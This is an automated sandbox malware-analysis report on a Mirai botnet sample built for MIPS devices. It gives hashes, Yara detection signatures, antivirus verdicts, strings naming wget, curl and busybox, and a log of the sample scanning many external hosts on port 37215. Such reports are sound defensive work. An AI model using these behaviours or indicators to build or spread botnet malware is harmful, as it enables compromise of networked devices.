Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
huhu.mips.elf

Overview

General Information

Sample name:huhu.mips.elf
Analysis ID:1385365
MD5:0cf8c3c29c266a1249355612d561f785
SHA1:c5c3d44a7907e638e463806c970bcb87ffa8fb66
SHA256:2b6f42cdf2086baba1554545343dc1090ceab7d156d967606e64cc15ca549db6
Infos:

Detection

Mirai
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1385365
Start date and time:2024-02-02 06:19:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:huhu.mips.elf
Detection:MAL
Classification:mal84.troj.linELF@0/1025@16/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/huhu.mips.elf
PID:5517
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5534, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5542, Parent: 1289)
  • Default (PID: 5542, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5561, Parent: 1289)
  • Default (PID: 5561, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5566, Parent: 1)
  • systemd-user-runtime-dir (PID: 5566, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
huhu.mips.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    huhu.mips.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      huhu.mips.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x267a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x267bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x267d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x267e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x267f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2680c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26820:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2685c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x268ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x268c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x268d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x268e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x268fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5517.1.00007f2b14400000.00007f2b1442a000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5517.1.00007f2b14400000.00007f2b1442a000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5517.1.00007f2b14400000.00007f2b1442a000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x267a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x267bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x267d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x267e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x267f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2680c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26820:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2685c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x268ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x268c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x268d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x268e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x268fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: huhu.mips.elf PID: 5517JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: huhu.mips.elf PID: 5517Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x402a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x403e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4052:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4066:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x407a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x408e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x40a2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x40b6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x40ca:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x40de:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x40f2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4106:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x411a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x412e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4142:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4156:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x416a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x417e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4192:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x41a6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x41ba:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: huhu.mips.elfAvira: detected
            Source: huhu.mips.elfVirustotal: Detection: 46%Perma Link
            Source: huhu.mips.elfString: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnanotfptabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f

            Networking

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 48190 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41288 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 49394
            Source: unknownNetwork traffic detected: HTTP traffic on port 47874 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36238 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43734 -> 37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 91.181.41.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 125.131.230.134:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.79.64.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.123.95.50:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.166.54.119:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.204.38.33:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.7.179.72:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.46.5.99:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.64.56.30:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.35.19.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.45.68.170:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.136.152.103:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.210.141.180:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.42.148.198:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.132.198.239:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.176.32.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 75.216.114.51:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.105.121.62:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.133.114.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 94.28.201.99:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 166.8.31.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.189.134.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.209.211.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 98.147.33.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.183.53.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.111.152.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.215.25.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.102.6.248:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 81.115.4.241:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.83.209.148:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.4.227.227:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.204.90.173:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.128.221.149:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.14.31.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.169.204.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.222.210.204:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.54.131.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.222.246.94:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.138.19.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.28.225.90:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.254.183.164:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.151.50.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 115.242.36.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.91.222.151:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.163.5.183:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.26.50.215:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.226.211.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 211.86.135.35:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 206.34.192.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.225.6.162:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.17.27.14:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.77.90.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.198.160.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 9.27.28.238:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 126.95.24.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.251.149.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.198.111.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 5.1.136.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.215.215.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 204.244.3.209:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.57.124.170:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.189.192.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.211.95.43:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 76.247.95.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.200.182.120:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 203.161.33.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.15.235.156:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.72.88.37:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.91.233.209:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.78.172.78:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 98.131.248.146:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.53.228.133:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.223.120.137:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.83.202.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.17.17.10:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 152.240.68.235:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 67.223.183.75:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.138.191.34:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.191.155.167:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 88.28.35.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.86.178.209:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.49.0.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 141.242.127.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.97.90.102:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.97.50.57:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.77.253.234:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.116.80.238:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.182.196.21:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.201.29.147:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 74.46.153.25:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 53.167.105.223:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.224.218.134:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 126.48.248.193:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 14.76.187.136:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.214.162.70:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.11.27.205:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.249.28.226:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.157.0.214:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 183.242.125.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.5.39.110:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.51.240.7:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 216.33.23.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.255.252.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.116.215.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 164.230.144.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 178.58.93.234:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.215.47.246:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 1.1.64.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.62.179.11:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 182.228.235.221:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 220.132.141.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 184.167.56.236:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.161.110.214:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.192.113.196:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 184.104.58.234:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.199.248.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 73.231.104.177:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 189.27.67.124:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 124.184.107.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 124.3.59.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 106.137.148.59:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.80.35.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 139.177.118.204:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.72.41.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 102.74.58.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.177.139.138:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.128.209.30:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 150.55.119.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.211.56.30:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.33.131.235:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 177.162.19.113:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 46.248.191.178:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.81.75.38:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.128.217.189:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.247.223.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.212.204.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.187.234.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 75.52.165.21:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.225.221.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.146.255.254:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.144.150.141:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.150.3.12:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.102.249.75:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.170.125.6:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 79.237.93.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.19.129.33:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.5.155.0:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.189.210.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.195.197.29:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 134.141.182.171:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.249.220.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.240.166.236:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.181.118.38:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.34.184.241:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 79.3.179.239:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.46.63.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.109.107.114:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.7.70.14:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.188.140.105:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 208.221.239.237:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.20.61.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.83.135.165:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.115.182.169:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.77.241.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 151.211.213.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.107.124.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.38.159.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.200.16.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.150.240.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 23.229.141.133:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.153.231.34:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 105.198.33.106:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 52.213.226.35:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.165.244.212:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 157.43.236.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 105.0.216.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.239.30.51:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 197.242.162.184:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 206.47.109.143:37215
            Source: global trafficTCP traffic: 192.168.2.14:37753 -> 41.14.230.142:37215
